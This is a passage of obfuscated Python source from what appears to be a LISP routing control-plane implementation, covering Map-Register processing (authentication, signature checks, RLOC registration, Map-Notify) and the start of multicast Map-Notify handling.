lprint ( "{} Map-Register with key-id {}" . format ( OooOOOoOoo0O0 , i1I1iI ) )
if 22 - 22: iII111i / II111iiii / Oo0Ooo . O0 % oO0o + OoOoOO00
IIiiI11 = chacha . ChaCha ( IiiI , i1Oo ) . decrypt ( packet [ 4 : : ] )
return ( packet [ 0 : 4 ] + IIiiI11 )
if 46 - 46: O0 - iIii1I11I1II1 . OoooooooOO . oO0o
if 51 - 51: I1Ii111 - o0oOOo0O0Ooo
if 5 - 5: O0
if 7 - 7: OoOoOO00 + OoO0O00 * I1IiiI
if 63 - 63: I1ii11iIi11i + iII111i * i1IIi
if 63 - 63: I1ii11iIi11i / II111iiii % oO0o + ooOoO0o . Ii1I % I11i
if 59 - 59: I1Ii111 % o0oOOo0O0Ooo - I1IiiI * i1IIi
def lisp_process_map_register ( lisp_sockets , packet , source , sport ) :
global lisp_registered_count
if 5 - 5: I1IiiI
if 22 - 22: II111iiii / iII111i
if 18 - 18: i11iIiiIii * ooOoO0o . I1IiiI + i1IIi + I11i
if 62 - 62: O0 % o0oOOo0O0Ooo + iIii1I11I1II1 + iIii1I11I1II1 * ooOoO0o
if 21 - 21: o0oOOo0O0Ooo % O0
if 81 - 81: i1IIi + i1IIi
packet = lisp_decrypt_map_register ( packet )
if ( packet == None ) : return
if 3 - 3: I1Ii111 . I1ii11iIi11i * iII111i * i11iIiiIii * IiII
oo0Oo0oOo0 = lisp_map_register ( )
OO0o0 , packet = oo0Oo0oOo0 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Register packet" )
return
if 47 - 47: iIii1I11I1II1 . OoO0O00 . iIii1I11I1II1
oo0Oo0oOo0 . sport = sport
if 57 - 57: IiII * ooOoO0o * ooOoO0o * iIii1I11I1II1 * I1Ii111 + OoOoOO00
oo0Oo0oOo0 . print_map_register ( )
if 83 - 83: OoOoOO00 . Oo0Ooo . OoO0O00
if 65 - 65: iII111i * iIii1I11I1II1
if 48 - 48: iII111i * OoO0O00
if 57 - 57: ooOoO0o + I1IiiI
iII111 = True
if ( oo0Oo0oOo0 . auth_len == LISP_SHA1_160_AUTH_DATA_LEN ) :
iII111 = True
if 23 - 23: Oo0Ooo + i11iIiiIii * ooOoO0o % OOooOOo - I11i
if ( oo0Oo0oOo0 . alg_id == LISP_SHA_256_128_ALG_ID ) :
iII111 = False
if 4 - 4: IiII % Oo0Ooo
if 65 - 65: OoO0O00
if 65 - 65: oO0o
if 77 - 77: I11i * i1IIi - OOooOOo / OoOoOO00
if 50 - 50: O0 - oO0o . oO0o
o0o00oo00O = [ ]
if 98 - 98: OoooooooOO . o0oOOo0O0Ooo % OOooOOo / O0 + I1Ii111 % i11iIiiIii
if 94 - 94: O0 + II111iiii - iII111i / i1IIi
if 25 - 25: ooOoO0o . OoO0O00 - oO0o
if 76 - 76: iIii1I11I1II1 / II111iiii * OoOoOO00 % iII111i . II111iiii + i11iIiiIii
iIiOo0OOOOo = None
oo0OO = packet
ooOo000OOooo = [ ]
o0oo0OoOo000 = oo0Oo0oOo0 . record_count
for IiIIi1IiiIiI in range ( o0oo0OoOo000 ) :
iiI = lisp_eid_record ( )
iIii1IiIiI = lisp_rloc_record ( )
packet = iiI . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Register packet" )
return
if 45 - 45: I1Ii111 / I1IiiI + Ii1I / iII111i / Ii1I + I1Ii111
iiI . print_record ( " " , False )
if 12 - 12: Oo0Ooo . i1IIi + iIii1I11I1II1 % I1ii11iIi11i
if 33 - 33: oO0o . oO0o / IiII + II111iiii
if 34 - 34: OoO0O00 . OoOoOO00 / i1IIi / OOooOOo
if 12 - 12: o0oOOo0O0Ooo . Oo0Ooo / II111iiii
oO00Oooo0o0o0 = lisp_site_eid_lookup ( iiI . eid , iiI . group ,
False )
if 18 - 18: I1Ii111 % II111iiii + Ii1I * Oo0Ooo - OoooooooOO . Oo0Ooo
i1iiii1 = oO00Oooo0o0o0 . print_eid_tuple ( ) if oO00Oooo0o0o0 else None
if 66 - 66: O0
if 68 - 68: oO0o / O0 % OoooooooOO
if 58 - 58: iII111i / II111iiii - I11i * iIii1I11I1II1 % OoOoOO00
if 14 - 14: iIii1I11I1II1 + oO0o / ooOoO0o
if 20 - 20: I1ii11iIi11i . II111iiii % I1Ii111 + I1Ii111 / OoooooooOO . Ii1I
if 98 - 98: OoooooooOO - i11iIiiIii - iII111i + Ii1I - I1IiiI
if 75 - 75: OOooOOo
if ( oO00Oooo0o0o0 and oO00Oooo0o0o0 . accept_more_specifics == False ) :
if ( oO00Oooo0o0o0 . eid_record_matches ( iiI ) == False ) :
i1II1 = oO00Oooo0o0o0 . parent_for_more_specifics
if ( i1II1 ) : oO00Oooo0o0o0 = i1II1
if 53 - 53: IiII / OoooooooOO / ooOoO0o + Oo0Ooo - OOooOOo - iIii1I11I1II1
if 53 - 53: OOooOOo . I1IiiI . o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 40 - 40: OoooooooOO + iII111i % I1Ii111 . ooOoO0o
if 2 - 2: ooOoO0o
if 55 - 55: I11i + i1IIi * OoOoOO00 % Oo0Ooo * II111iiii . I1IiiI
if 98 - 98: I1ii11iIi11i
if 57 - 57: OOooOOo * I11i . oO0o
if 17 - 17: iII111i - OOooOOo * I1IiiI + i1IIi % I1ii11iIi11i
o0OOOooO = ( oO00Oooo0o0o0 and oO00Oooo0o0o0 . accept_more_specifics )
if ( o0OOOooO ) :
iiiIII1iIiI = lisp_site_eid ( oO00Oooo0o0o0 . site )
iiiIII1iIiI . dynamic = True
iiiIII1iIiI . eid . copy_address ( iiI . eid )
iiiIII1iIiI . group . copy_address ( iiI . group )
iiiIII1iIiI . parent_for_more_specifics = oO00Oooo0o0o0
iiiIII1iIiI . add_cache ( )
iiiIII1iIiI . inherit_from_ams_parent ( )
oO00Oooo0o0o0 . more_specific_registrations . append ( iiiIII1iIiI )
oO00Oooo0o0o0 = iiiIII1iIiI
else :
oO00Oooo0o0o0 = lisp_site_eid_lookup ( iiI . eid , iiI . group ,
True )
if 22 - 22: IiII - I1ii11iIi11i . ooOoO0o + I1ii11iIi11i
if 37 - 37: oO0o
I11i11i1 = iiI . print_eid_tuple ( )
if 59 - 59: I11i
if ( oO00Oooo0o0o0 == None ) :
i1i1IiIIIiI = bold ( "Site not found" , False )
lprint ( " {} for EID {}{}" . format ( i1i1IiIIIiI , green ( I11i11i1 , False ) ,
", matched non-ams {}" . format ( green ( i1iiii1 , False ) if i1iiii1 else "" ) ) )
if 61 - 61: IiII * I1Ii111 * OoO0O00 / oO0o - OoooooooOO
if 5 - 5: o0oOOo0O0Ooo % OOooOOo % II111iiii
if 86 - 86: O0 . ooOoO0o * OoooooooOO + Ii1I / I11i / II111iiii
if 26 - 26: OoooooooOO - I1Ii111 / Oo0Ooo - iII111i % OoOoOO00 * OoooooooOO
if 3 - 3: oO0o
packet = iIii1IiIiI . end_of_rlocs ( packet , iiI . rloc_count )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 3 - 3: I1ii11iIi11i . IiII + ooOoO0o
continue
if 66 - 66: OOooOOo + oO0o - ooOoO0o / Ii1I * OoO0O00 * i11iIiiIii
if 69 - 69: I11i % i11iIiiIii
iIiOo0OOOOo = oO00Oooo0o0o0 . site
if 34 - 34: Ii1I . OoooooooOO + II111iiii % oO0o
if ( o0OOOooO ) :
oOo = oO00Oooo0o0o0 . parent_for_more_specifics . print_eid_tuple ( )
lprint ( " Found ams {} for site '{}' for registering prefix {}" . format ( green ( oOo , False ) , iIiOo0OOOOo . site_name , green ( I11i11i1 , False ) ) )
if 69 - 69: i11iIiiIii % I1IiiI * i11iIiiIii - OoO0O00 * iIii1I11I1II1
else :
oOo = green ( oO00Oooo0o0o0 . print_eid_tuple ( ) , False )
lprint ( " Found {} for site '{}' for registering prefix {}" . format ( oOo , iIiOo0OOOOo . site_name , green ( I11i11i1 , False ) ) )
if 70 - 70: I1Ii111 . OoOoOO00 % OoooooooOO + OoOoOO00 / II111iiii
if 39 - 39: I1Ii111 * I1IiiI - o0oOOo0O0Ooo . oO0o . OOooOOo * i11iIiiIii
if 70 - 70: OoOoOO00 / OOooOOo - o0oOOo0O0Ooo
if 82 - 82: OOooOOo . i11iIiiIii . I1ii11iIi11i % OoOoOO00 * Ii1I / OoO0O00
if 56 - 56: o0oOOo0O0Ooo / I1IiiI + I11i + I1IiiI
if 34 - 34: Oo0Ooo / i11iIiiIii - ooOoO0o
if ( iIiOo0OOOOo . shutdown ) :
lprint ( ( " Rejecting registration for site '{}', configured in " +
"admin-shutdown state" ) . format ( iIiOo0OOOOo . site_name ) )
packet = iIii1IiIiI . end_of_rlocs ( packet , iiI . rloc_count )
continue
if 77 - 77: OoOoOO00 * OoooooooOO
if 41 - 41: iIii1I11I1II1 - O0 . II111iiii + I1IiiI - II111iiii / oO0o
if 35 - 35: ooOoO0o - OoOoOO00 / iIii1I11I1II1 / OOooOOo
if 38 - 38: i1IIi % OoooooooOO
if 5 - 5: iIii1I11I1II1 + iIii1I11I1II1 . iIii1I11I1II1 + o0oOOo0O0Ooo
if 45 - 45: I1IiiI - OoooooooOO - I1Ii111 - i1IIi - OoooooooOO * O0
if 67 - 67: OoOoOO00 * o0oOOo0O0Ooo . IiII
if 72 - 72: OoOoOO00 % OoooooooOO * O0
IIIiI1i = oo0Oo0oOo0 . key_id
if ( iIiOo0OOOOo . auth_key . has_key ( IIIiI1i ) ) :
IIii1 = iIiOo0OOOOo . auth_key [ IIIiI1i ]
else :
IIii1 = ""
if 58 - 58: oO0o / ooOoO0o
if 31 - 31: o0oOOo0O0Ooo % I11i - OoO0O00
IIIIi1Iiii = lisp_verify_auth ( OO0o0 , oo0Oo0oOo0 . alg_id ,
oo0Oo0oOo0 . auth_data , IIii1 )
Oo0OooOoOO0O = "dynamic " if oO00Oooo0o0o0 . dynamic else ""
if 7 - 7: o0oOOo0O0Ooo * I1Ii111 * o0oOOo0O0Ooo - OoO0O00 * Oo0Ooo - IiII
oOo0ooOO0O = bold ( "passed" if IIIIi1Iiii else "failed" , False )
IIIiI1i = "key-id {}" . format ( IIIiI1i ) if IIIiI1i == oo0Oo0oOo0 . key_id else "bad key-id {}" . format ( oo0Oo0oOo0 . key_id )
if 10 - 10: i1IIi - OoOoOO00
lprint ( " Authentication {} for {}EID-prefix {}, {}" . format ( oOo0ooOO0O , Oo0OooOoOO0O , green ( I11i11i1 , False ) , IIIiI1i ) )
if 25 - 25: o0oOOo0O0Ooo . I1IiiI % iIii1I11I1II1 * Ii1I % I1IiiI * I11i
if 21 - 21: O0 % II111iiii % OoOoOO00 / Ii1I * ooOoO0o
if 82 - 82: I1IiiI % II111iiii * iIii1I11I1II1
if 83 - 83: O0 + i1IIi
if 47 - 47: iIii1I11I1II1 * i11iIiiIii % Ii1I + IiII
if 39 - 39: i1IIi / i11iIiiIii % ooOoO0o - ooOoO0o % i1IIi
oOII1ii11iI = True
OoooOOo00oOO = ( lisp_get_eid_hash ( iiI . eid ) != None )
if ( OoooOOo00oOO or oO00Oooo0o0o0 . require_signature ) :
O0OOoooo0O0 = "Required " if oO00Oooo0o0o0 . require_signature else ""
I11i11i1 = green ( I11i11i1 , False )
oOo00O = lisp_find_sig_in_rloc_set ( packet , iiI . rloc_count )
if ( oOo00O == None ) :
oOII1ii11iI = False
lprint ( ( " {}EID-crypto-hash signature verification {} " + "for EID-prefix {}, no signature found" ) . format ( O0OOoooo0O0 ,
# IiII % ooOoO0o
bold ( "failed" , False ) , I11i11i1 ) )
else :
oOII1ii11iI = lisp_verify_cga_sig ( iiI . eid , oOo00O )
oOo0ooOO0O = bold ( "passed" if oOII1ii11iI else "failed" , False )
lprint ( ( " {}EID-crypto-hash signature verification {} " + "for EID-prefix {}" ) . format ( O0OOoooo0O0 , oOo0ooOO0O , I11i11i1 ) )
if 100 - 100: Oo0Ooo . oO0o - iII111i + OoooooooOO
if 27 - 27: Oo0Ooo . I1Ii111 - i1IIi * I1IiiI
if 96 - 96: I1ii11iIi11i - Ii1I . I1ii11iIi11i
if 89 - 89: II111iiii % I1ii11iIi11i % IiII . I11i
if ( IIIIi1Iiii == False or oOII1ii11iI == False ) :
packet = iIii1IiIiI . end_of_rlocs ( packet , iiI . rloc_count )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 49 - 49: iII111i % i11iIiiIii * I11i - oO0o . OOooOOo . i11iIiiIii
continue
if 26 - 26: iIii1I11I1II1 + i11iIiiIii % iII111i + I1IiiI + oO0o - ooOoO0o
if 4 - 4: Oo0Ooo - IiII - I11i
if 72 - 72: OoooooooOO
if 19 - 19: Oo0Ooo . OOooOOo
if 58 - 58: IiII % iII111i + i1IIi % I1IiiI % OOooOOo . iII111i
if 85 - 85: i11iIiiIii . o0oOOo0O0Ooo * iII111i . I1ii11iIi11i / I1Ii111 % Ii1I
if ( oo0Oo0oOo0 . merge_register_requested ) :
i1II1 = oO00Oooo0o0o0
i1II1 . inconsistent_registration = False
if 27 - 27: II111iiii . iIii1I11I1II1 / I1ii11iIi11i / i1IIi / iIii1I11I1II1
if 70 - 70: i11iIiiIii . OoO0O00 / OoooooooOO * OoooooooOO - OOooOOo
if 34 - 34: I1ii11iIi11i * i1IIi % OoooooooOO / I1IiiI
if 39 - 39: OoO0O00 + IiII - II111iiii % I11i
if 80 - 80: o0oOOo0O0Ooo * ooOoO0o
if ( oO00Oooo0o0o0 . group . is_null ( ) ) :
if ( i1II1 . site_id != oo0Oo0oOo0 . site_id ) :
i1II1 . site_id = oo0Oo0oOo0 . site_id
i1II1 . registered = False
i1II1 . individual_registrations = { }
i1II1 . registered_rlocs = [ ]
lisp_registered_count -= 1
if 87 - 87: I1Ii111 + O0 / I1ii11iIi11i / OoOoOO00 . Oo0Ooo - IiII
if 24 - 24: OoOoOO00
if 19 - 19: ooOoO0o
ii1i1I1111ii = source . address + oo0Oo0oOo0 . xtr_id
if ( oO00Oooo0o0o0 . individual_registrations . has_key ( ii1i1I1111ii ) ) :
oO00Oooo0o0o0 = oO00Oooo0o0o0 . individual_registrations [ ii1i1I1111ii ]
else :
oO00Oooo0o0o0 = lisp_site_eid ( iIiOo0OOOOo )
oO00Oooo0o0o0 . eid . copy_address ( i1II1 . eid )
oO00Oooo0o0o0 . group . copy_address ( i1II1 . group )
i1II1 . individual_registrations [ ii1i1I1111ii ] = oO00Oooo0o0o0
if 43 - 43: O0 . I1Ii111 % OoooooooOO / I1IiiI . o0oOOo0O0Ooo - OoOoOO00
else :
oO00Oooo0o0o0 . inconsistent_registration = oO00Oooo0o0o0 . merge_register_requested
if 46 - 46: I11i - OoooooooOO % o0oOOo0O0Ooo
if 7 - 7: OoooooooOO - I1Ii111 * IiII
if 20 - 20: o0oOOo0O0Ooo . OoooooooOO * I1IiiI . Oo0Ooo * OoOoOO00
oO00Oooo0o0o0 . map_registers_received += 1
if 3 - 3: I1Ii111 % i11iIiiIii % O0 % II111iiii
if 8 - 8: OoooooooOO * ooOoO0o
if 26 - 26: i11iIiiIii + oO0o - i1IIi
if 71 - 71: I1IiiI % I1Ii111 / oO0o % oO0o / iIii1I11I1II1 + I1Ii111
if 86 - 86: IiII % i1IIi * o0oOOo0O0Ooo - I1Ii111
o0Oo0o0ooOOO = ( oO00Oooo0o0o0 . is_rloc_in_rloc_set ( source ) == False )
if ( iiI . record_ttl == 0 and o0Oo0o0ooOOO ) :
lprint ( " Ignore deregistration request from {}" . format ( red ( source . print_address_no_iid ( ) , False ) ) )
if 37 - 37: iII111i % I1IiiI - I1ii11iIi11i % I11i
continue
if 35 - 35: O0 - OoooooooOO % iII111i
if 48 - 48: OOooOOo % i11iIiiIii
if 49 - 49: O0 * iII111i + II111iiii - OOooOOo
if 29 - 29: OoooooooOO % II111iiii - Oo0Ooo / IiII - i11iIiiIii
if 64 - 64: iII111i . I1Ii111 + I1Ii111
if 1 - 1: OOooOOo % Oo0Ooo
OO00o = oO00Oooo0o0o0 . registered_rlocs
oO00Oooo0o0o0 . registered_rlocs = [ ]
if 76 - 76: OoooooooOO % O0 / OoO0O00
if 41 - 41: i11iIiiIii - I1ii11iIi11i - II111iiii
if 5 - 5: OoOoOO00 + i1IIi
if 43 - 43: iII111i * I1IiiI
IiOOo = packet
for oOoOoO0O in range ( iiI . rloc_count ) :
iIii1IiIiI = lisp_rloc_record ( )
packet = iIii1IiIiI . decode ( packet , None )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 99 - 99: OOooOOo . IiII
iIii1IiIiI . print_record ( " " )
if 77 - 77: I1IiiI + I11i * iIii1I11I1II1 / I1IiiI - iII111i
if 42 - 42: oO0o * IiII
if 37 - 37: I11i * ooOoO0o / IiII . I1ii11iIi11i + II111iiii
if 55 - 55: OoO0O00
if ( len ( iIiOo0OOOOo . allowed_rlocs ) > 0 ) :
oo0o00OO = iIii1IiIiI . rloc . print_address ( )
if ( iIiOo0OOOOo . allowed_rlocs . has_key ( oo0o00OO ) == False ) :
lprint ( ( " Reject registration, RLOC {} not " + "configured in allowed RLOC-set" ) . format ( red ( oo0o00OO , False ) ) )
if 63 - 63: o0oOOo0O0Ooo / IiII - i11iIiiIii
if 99 - 99: O0 + O0 . iIii1I11I1II1 . ooOoO0o * o0oOOo0O0Ooo
oO00Oooo0o0o0 . registered = False
packet = iIii1IiIiI . end_of_rlocs ( packet ,
iiI . rloc_count - oOoOoO0O - 1 )
break
if 1 - 1: I1Ii111 - I11i . OoOoOO00
if 72 - 72: II111iiii . O0 . I11i * OoO0O00
if 70 - 70: iII111i % OoooooooOO * I1ii11iIi11i . I11i / OoO0O00
if 6 - 6: O0 . i11iIiiIii
if 85 - 85: i11iIiiIii / Ii1I + Oo0Ooo / OoOoOO00 - I1IiiI
if 39 - 39: OoO0O00
oOo00O = lisp_rloc ( )
oOo00O . store_rloc_from_record ( iIii1IiIiI , None , source )
if 97 - 97: iIii1I11I1II1 . I1IiiI - O0
if 41 - 41: I11i . OoOoOO00 * O0 % Ii1I
if 54 - 54: ooOoO0o
if 13 - 13: I11i
if 18 - 18: II111iiii * oO0o % i11iIiiIii / IiII . ooOoO0o
if 2 - 2: OoOoOO00 % I1Ii111
if ( source . is_exact_match ( oOo00O . rloc ) ) :
oOo00O . map_notify_requested = oo0Oo0oOo0 . map_notify_requested
if 35 - 35: OOooOOo
if 50 - 50: iIii1I11I1II1 . I1IiiI + i11iIiiIii
if 65 - 65: I11i % I1IiiI
if 3 - 3: i11iIiiIii % OOooOOo - Ii1I . i1IIi
if 24 - 24: OOooOOo
oO00Oooo0o0o0 . registered_rlocs . append ( oOo00O )
if 93 - 93: I1ii11iIi11i - iII111i % O0 - Ii1I
if 84 - 84: I1ii11iIi11i . iIii1I11I1II1 % IiII * I11i + ooOoO0o
OOOO00OO0O0o = ( oO00Oooo0o0o0 . do_rloc_sets_match ( OO00o ) == False )
if 20 - 20: iIii1I11I1II1 % oO0o + o0oOOo0O0Ooo + oO0o % IiII
if 84 - 84: IiII - O0 . I1ii11iIi11i % OOooOOo % iII111i + OoooooooOO
if 74 - 74: o0oOOo0O0Ooo + OoOoOO00 - o0oOOo0O0Ooo
if 2 - 2: OOooOOo
if 14 - 14: Ii1I - O0 - IiII % Ii1I / OoOoOO00 * OoooooooOO
if 57 - 57: Oo0Ooo % Oo0Ooo % O0 . I1Ii111 % I1ii11iIi11i
if ( oo0Oo0oOo0 . map_register_refresh and OOOO00OO0O0o and
oO00Oooo0o0o0 . registered ) :
lprint ( " Reject registration, refreshes cannot change RLOC-set" )
oO00Oooo0o0o0 . registered_rlocs = OO00o
continue
if 97 - 97: Oo0Ooo % OoO0O00 * I1ii11iIi11i * ooOoO0o * OoO0O00
if 12 - 12: ooOoO0o
if 56 - 56: i1IIi
if 3 - 3: OOooOOo - Oo0Ooo * Ii1I + i11iIiiIii
if 53 - 53: i1IIi % I1ii11iIi11i
if 65 - 65: I11i + OoOoOO00 - i11iIiiIii
if ( oO00Oooo0o0o0 . registered == False ) :
oO00Oooo0o0o0 . first_registered = lisp_get_timestamp ( )
lisp_registered_count += 1
if 72 - 72: i11iIiiIii - iII111i . i11iIiiIii
oO00Oooo0o0o0 . last_registered = lisp_get_timestamp ( )
oO00Oooo0o0o0 . registered = ( iiI . record_ttl != 0 )
oO00Oooo0o0o0 . last_registerer = source
if 61 - 61: oO0o . i11iIiiIii / Ii1I % iII111i
if 36 - 36: OoO0O00 + Ii1I / I11i - iII111i % OoO0O00 / Oo0Ooo
if 38 - 38: Ii1I - ooOoO0o - O0 + oO0o . iIii1I11I1II1
if 90 - 90: i1IIi * OoOoOO00
oO00Oooo0o0o0 . auth_sha1_or_sha2 = iII111
oO00Oooo0o0o0 . proxy_reply_requested = oo0Oo0oOo0 . proxy_reply_requested
oO00Oooo0o0o0 . lisp_sec_present = oo0Oo0oOo0 . lisp_sec_present
oO00Oooo0o0o0 . map_notify_requested = oo0Oo0oOo0 . map_notify_requested
oO00Oooo0o0o0 . mobile_node_requested = oo0Oo0oOo0 . mobile_node
oO00Oooo0o0o0 . merge_register_requested = oo0Oo0oOo0 . merge_register_requested
if 27 - 27: iIii1I11I1II1
oO00Oooo0o0o0 . use_register_ttl_requested = oo0Oo0oOo0 . use_ttl_for_timeout
if ( oO00Oooo0o0o0 . use_register_ttl_requested ) :
oO00Oooo0o0o0 . register_ttl = iiI . store_ttl ( )
else :
oO00Oooo0o0o0 . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
if 95 - 95: iII111i / ooOoO0o % Ii1I
oO00Oooo0o0o0 . xtr_id_present = oo0Oo0oOo0 . xtr_id_present
if ( oO00Oooo0o0o0 . xtr_id_present ) :
oO00Oooo0o0o0 . xtr_id = oo0Oo0oOo0 . xtr_id
oO00Oooo0o0o0 . site_id = oo0Oo0oOo0 . site_id
if 44 - 44: OOooOOo . OOooOOo
if 5 - 5: oO0o + OoooooooOO
if 88 - 88: oO0o + OOooOOo
if 14 - 14: I11i / i1IIi
if 56 - 56: OoooooooOO
if ( oo0Oo0oOo0 . merge_register_requested ) :
if ( i1II1 . merge_in_site_eid ( oO00Oooo0o0o0 ) ) :
o0o00oo00O . append ( [ iiI . eid , iiI . group ] )
if 59 - 59: I1ii11iIi11i + OoO0O00
if ( oo0Oo0oOo0 . map_notify_requested ) :
lisp_send_merged_map_notify ( lisp_sockets , i1II1 , oo0Oo0oOo0 ,
iiI )
if 37 - 37: IiII * I1IiiI % O0
if 32 - 32: ooOoO0o % II111iiii
if 60 - 60: i11iIiiIii
if ( OOOO00OO0O0o == False ) : continue
if ( len ( o0o00oo00O ) != 0 ) : continue
if 11 - 11: o0oOOo0O0Ooo
ooOo000OOooo . append ( oO00Oooo0o0o0 . print_eid_tuple ( ) )
if 77 - 77: o0oOOo0O0Ooo / iIii1I11I1II1 * iIii1I11I1II1 / o0oOOo0O0Ooo * iII111i
if 26 - 26: Ii1I
if 1 - 1: OoOoOO00 . o0oOOo0O0Ooo + Oo0Ooo % Oo0Ooo * I1ii11iIi11i
if 50 - 50: IiII / i1IIi . I1ii11iIi11i
if 75 - 75: I11i * oO0o + OoooooooOO . iII111i + OoO0O00
if 44 - 44: II111iiii
if 65 - 65: I11i . iII111i . I1IiiI - Oo0Ooo % iIii1I11I1II1 / O0
iiI = iiI . encode ( )
iiI += IiOOo
OooOOoooOO00 = [ oO00Oooo0o0o0 . print_eid_tuple ( ) ]
lprint ( " Changed RLOC-set, Map-Notifying old RLOC-set" )
if 54 - 54: iII111i - I1Ii111
for oOo00O in OO00o :
if ( oOo00O . map_notify_requested == False ) : continue
if ( oOo00O . rloc . is_exact_match ( source ) ) : continue
lisp_build_map_notify ( lisp_sockets , iiI , OooOOoooOO00 , 1 , oOo00O . rloc ,
LISP_CTRL_PORT , oo0Oo0oOo0 . nonce , oo0Oo0oOo0 . key_id ,
oo0Oo0oOo0 . alg_id , oo0Oo0oOo0 . auth_len , iIiOo0OOOOo , False )
if 88 - 88: iII111i * OoO0O00 % OoooooooOO / oO0o
if 7 - 7: i1IIi
if 30 - 30: oO0o . i1IIi / I11i
if 23 - 23: i1IIi + oO0o % iII111i - OoO0O00 - i1IIi
if 74 - 74: Ii1I + I11i . OoooooooOO - I1ii11iIi11i
lisp_notify_subscribers ( lisp_sockets , iiI , oO00Oooo0o0o0 . eid , iIiOo0OOOOo )
if 2 - 2: oO0o - o0oOOo0O0Ooo
if 80 - 80: i1IIi
if 40 - 40: O0 . ooOoO0o * iII111i . I11i + I1Ii111 % OoO0O00
if 9 - 9: IiII * oO0o - o0oOOo0O0Ooo
if 17 - 17: iII111i % Oo0Ooo
if ( len ( o0o00oo00O ) != 0 ) :
lisp_queue_multicast_map_notify ( lisp_sockets , o0o00oo00O )
if 14 - 14: I1IiiI - I1Ii111 % I1IiiI - II111iiii
if 34 - 34: I1ii11iIi11i * IiII / II111iiii / ooOoO0o * oO0o
if 3 - 3: II111iiii
if 61 - 61: oO0o . I1IiiI + i1IIi
if 69 - 69: O0 / i1IIi - OoOoOO00 + ooOoO0o - oO0o
if 80 - 80: o0oOOo0O0Ooo % O0 * I11i . i1IIi - ooOoO0o
if ( oo0Oo0oOo0 . merge_register_requested ) : return
if 93 - 93: OoooooooOO / o0oOOo0O0Ooo
if 61 - 61: II111iiii / i1IIi . I1ii11iIi11i % iIii1I11I1II1
if 66 - 66: iIii1I11I1II1 % OoOoOO00 + i1IIi * i11iIiiIii * OoooooooOO
if 36 - 36: iII111i - OoO0O00 + I1IiiI + Ii1I . OoooooooOO
if 75 - 75: oO0o * Oo0Ooo * O0
if ( oo0Oo0oOo0 . map_notify_requested and iIiOo0OOOOo != None ) :
lisp_build_map_notify ( lisp_sockets , oo0OO , ooOo000OOooo ,
oo0Oo0oOo0 . record_count , source , sport , oo0Oo0oOo0 . nonce ,
oo0Oo0oOo0 . key_id , oo0Oo0oOo0 . alg_id , oo0Oo0oOo0 . auth_len ,
iIiOo0OOOOo , True )
if 22 - 22: ooOoO0o / OoooooooOO . II111iiii / Ii1I * OoO0O00 . i1IIi
return
if 62 - 62: oO0o % Ii1I - Ii1I
if 16 - 16: OoO0O00 - O0 - OOooOOo - I11i % OoOoOO00
if 7 - 7: I1Ii111 / OoOoOO00 . II111iiii
if 9 - 9: I11i . I11i . OoooooooOO
if 42 - 42: iII111i / oO0o / iII111i * OoO0O00
if 25 - 25: OoOoOO00 - II111iiii + II111iiii . Ii1I * II111iiii
if 12 - 12: IiII / Ii1I
if 54 - 54: Oo0Ooo + Ii1I % OoooooooOO * OOooOOo / OoOoOO00
if 39 - 39: I1IiiI % i11iIiiIii % Ii1I
if 59 - 59: ooOoO0o % OoO0O00 / I1IiiI - II111iiii + OoooooooOO * i11iIiiIii
def lisp_process_multicast_map_notify ( packet , source ) :
IiiiiIiI1ii = lisp_map_notify ( "" )
packet = IiiiiIiI1ii . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Notify packet" )
return
if 58 - 58: IiII / Oo0Ooo + o0oOOo0O0Ooo
if 71 - 71: Ii1I - IiII
IiiiiIiI1ii . print_notify ( )
if ( IiiiiIiI1ii . record_count == 0 ) : return
if 2 - 2: OoOoOO00 % IiII % OoO0O00 . i1IIi / I1Ii111 - iIii1I11I1II1
oO0oOOoo0OO0 = IiiiiIiI1ii . eid_records
if 25 - 25: iII111i / iII111i
for IiIIi1IiiIiI in range ( IiiiiIiI1ii . record_count ) :
iiI = lisp_eid_record ( )
oO0oOOoo0OO0 = iiI . decode ( oO0oOOoo0OO0 )
if ( packet == None ) : return
iiI . print_record ( " " , False )
if 7 - 7: II111iiii * Ii1I * OoO0O00 / o0oOOo0O0Ooo
if 71 - 71: ooOoO0o - i11iIiiIii - OoO0O00 % iII111i * OoooooooOO * OoooooooOO
if 44 - 44: OoO0O00 . OoOoOO00 + I1Ii111
if 9 - 9: IiII . I11i . I1Ii111 / i1IIi * OoOoOO00 - O0
IiiiiII1i = lisp_map_cache_lookup ( iiI . eid , iiI . group )
if ( IiiiiII1i == None ) :
Ii1iIIi1I1II1I , O0o000 , o00oo0 = lisp_allow_gleaning ( iiI . eid , iiI . group ,
None )
if ( Ii1iIIi1I1II1I == False ) : continue
if 93 - 93: o0oOOo0O0Ooo % OoooooooOO
IiiiiII1i = lisp_mapping ( iiI . eid , iiI . group , [ ] )
IiiiiII1i . add_cache ( )
if 47 - 47: iIii1I11I1II1 - OOooOOo + I1ii11iIi11i * ooOoO0o + Oo0Ooo + OoO0O00
if 64 - 64: OoOoOO00 - OoOoOO00 . OoooooooOO + ooOoO0o
if 100 - 100: ooOoO0o . OoooooooOO % i1IIi % OoO0O00
if 26 - 26: OoOoOO00 * IiII
if 76 - 76: I1IiiI + IiII * I1ii11iIi11i * I1IiiI % Ii1I + ooOoO0o
if 46 - 46: OoOoOO00
if 66 - 66: iII111i - O0 . I1Ii111 * i1IIi / OoO0O00 / II111iiii
if ( IiiiiII1i . gleaned ) :
lprint ( "Ignore Map-Notify for gleaned {}" . format ( green ( IiiiiII1i . print_eid_tuple ( ) , False ) ) )
if 35 - 35: ooOoO0o * OOooOOo / I11i % I11i / OoooooooOO . I1Ii111
continue
if 70 - 70: I1ii11iIi11i % I1ii11iIi11i / oO0o
if 85 - 85: OoOoOO00 % I11i / Oo0Ooo + I11i - Oo0Ooo
IiiiiII1i . mapping_source = None if source == "lisp-etr" else source
IiiiiII1i . map_cache_ttl = iiI . store_ttl ( )
if 20 - 20: IiII
if 81 - 81: Oo0Ooo / I1Ii111
if 20 - 20: o0oOOo0O0Ooo + ooOoO0o % i1IIi
if 51 - 51: iII111i - ooOoO0o
if 32 - 32: IiII - i11iIiiIii
